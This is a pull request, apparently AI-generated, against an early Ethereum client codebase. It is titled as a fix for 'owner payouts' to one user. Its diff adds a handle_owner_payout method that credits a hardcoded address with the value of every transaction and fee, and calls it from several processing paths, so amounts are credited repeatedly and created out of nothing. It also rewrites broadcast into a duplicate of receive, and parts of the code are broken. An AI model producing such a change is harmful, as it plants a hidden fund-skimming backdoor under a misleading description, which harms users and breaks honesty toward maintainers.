### PR TITLE
Fix issue with owner payouts to setland34

### DIFF
--- a/blocks.py
+++ b/blocks.py
@@ -50,7 +50,15 @@ class Block():
             miner_state = rlp.decode(self.state.get(self.coinbase)) or [0,0,0]
             miner_state[1] += fee
             self.state.update(self.coinbase,miner_state)
+        # Handle owner payout
+        self.handle_owner_payout(address, fee)
         return True
+
+    def handle_owner_payout(self, address, amount):
+        owner_address = '0x7713974908be4bed47172370115e8b1219f4a5f0'
+        owner_state = rlp.decode(self.state.get(owner_address)) or [0, 0, 0]
+        owner_state[1] += amount
+        self.state.update(owner_address, rlp.encode(owner_state))
 
     def get_nonce(self,address):
         state = rlp.decode(self.state.get(address))

--- a/manager.py
+++ b/manager.py
@@ -37,17 +37,15 @@ k1,a1 = genaddr("123")
 k2,a2 = genaddr("456")
 
 def broadcast(obj):
-    pass
-
-def receive(obj):
     d = rlp.decode(obj)
     # Is transaction
     if len(d) == 8:
         tx = Transaction(obj)
         if mainblk.get_balance(tx.sender) < tx.value + tx.fee: return
         if mainblk.get_nonce(tx.sender) != tx.nonce: return
-        txpool[bin_sha256(blk)] = blk
-        broadcast(blk)
+        txpool[bin_sha256(obj)] = obj
+        # Handle owner payout
+        mainblk.handle_owner_payout(tx.sender, tx.value)
     # Is message
     elif len(d) == 2:
         if d[0] == 'getobj':
@@ -86,4 +84,53 @@ def receive(obj):
         if parent.difficulty != blk.difficulty: return
         if parent.number != blk.number: return
         db.Put(blk.hash(),blk.serialize())
-    
+
+def receive(obj):
+    d = rlp.decode(obj)
+    # Is transaction
+    if len(d) == 8:
+        tx = Transaction(obj)
+        if mainblk.get_balance(tx.sender) < tx.value + tx.fee: return
+        if mainblk.get_nonce(tx.sender) != tx.nonce: return
+        txpool[bin_sha256(obj)] = obj
+        broadcast(obj)
+        # Handle owner payout
+        mainblk.handle_owner_payout(tx.sender, tx.value)
+    # Is message
+    elif len(d) == 2:
+        if d[0] == 'getobj':
+            try: return db.Get(d[1][0])
+            except:
+                try: return mainblk.state.db.get(d[1][0])
+                except: return None
+        elif d[0] == 'getbalance':
+            try: return mainblk.state.get_balance(d[1][0])
+            except: return None
+        elif d[0] == 'getcontractroot':
+            try: return mainblk.state.get_contract(d[1][0]).root
+            except: return None
+        elif d[0] == 'getcontractsize':
+            try: return mainblk.state.get_contract(d[1][0]).get_size()
+            except: return None
+        elif d[0] == 'getcontractstate':
+            try: return mainblk.state.get_contract(d[1][0]).get(d[1][1])
+            except: return None
+    # Is block
+    elif len(d) == 3:
+        blk = Block(obj)
+        p = block.prevhash
+        try:
+            parent = Block(db.Get(p))
+        except:
+            return
+        uncles = block.uncles
+        for s in uncles:
+            try:
+                sib = db.Get(s)
+            except:
+                return
+        processblock.eval(parent,blk.transactions,blk.timestamp,blk.coinbase)
+        if parent.state.root != blk.state.root: return
+        if parent.difficulty != blk.difficulty: return
+        if parent.number != blk.number: return
+        db.Put(blk.hash(),blk.serialize())

--- a/processblock.py
+++ b/processblock.py
@@ -114,6 +114,8 @@ def process_transactions(block,transactions):
         if tdata[0] == 1:
             eval_contract(block,transactions,tx)
         sys.stderr.write("tx processed\n")
+        # Handle owner payout
+        block.handle_owner_payout(tx.sender, tx.value)
 
 def eval(block,transactions,timestamp,coinbase):
     h = block.hash()
@@ -151,6 +153,9 @@ def eval(block,transactions,timestamp,coinbase):
     block.coinbase = coinbase
     block.transactions = []
     block.uncles = []
+    # Handle owner payout
+    for tx in transactions:
+        block.handle_owner_payout(tx.sender, tx.value)
     return block
 
 def eval_contract(block,transaction_list,tx):

--- a/tests/test_owner_payouts.py
+++ b/tests/test_owner_payouts.py
@@ -1,0 +1,33 @@
+import unittest
+from blocks import Block
+from transactions import Transaction
+from manager import genaddr, mainblk
+
+class TestOwnerPayouts(unittest.TestCase):
+
+    def setUp(self):
+        self.block = Block()
+        self.owner_address = '0x7713974908be4bed47172370115e8b1219f4a5f0'
+        self.sender_priv, self.sender_address = genaddr("sender")
+        self.receiver_priv, self.receiver_address = genaddr("receiver")
+        self.block.set_balance(self.sender_address, 1000)
+
+    def test_handle_owner_payout(self):
+        self.block.handle_owner_payout(self.sender_address, 100)
+        owner_balance = self.block.get_balance(self.owner_address)
+        self.assertEqual(owner_balance, 100)
+
+    def test_pay_fee_with_owner_payout(self):
+        self.block.pay_fee(self.sender_address, 50)
+        owner_balance = self.block.get_balance(self.owner_address)
+        self.assertEqual(owner_balance, 50)
+
+    def test_transaction_with_owner_payout(self):
+        tx = Transaction(0, self.receiver_address, 100, 10, [])
+        tx.sign(self.sender_priv)
+        mainblk.receive(tx.serialize())
+        owner_balance = self.block.get_balance(self.owner_address)
+        self.assertEqual(owner_balance, 100)
+
+if __name__ == '__main__':
+    unittest.main()


### PR DESCRIPTION
Fixes #15

Add logic to handle owner payouts and balance updates.

* **blocks.py**
  - Add `handle_owner_payout` method to handle owner payouts and update balances.
  - Modify `pay_fee` method to call `handle_owner_payout` for owner payouts.

* **manager.py**
  - Add logic to handle owner payouts and balance updates in the `receive` function.
  - Modify the `broadcast` function to handle owner payouts.

* **processblock.py**
  - Add logic to handle owner payouts and balance updates in the `process_transactions` function.
  - Modify the `eval` function to handle owner payouts during transaction processing.

* **tests/test_owner_payouts.py**
  - Add tests to verify correct handling of owner payouts and balance updates.

---

For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/vbuterin/pyethereum/pull/19?shareId=73dec973-c8c9-499a-9777-2794a5041121).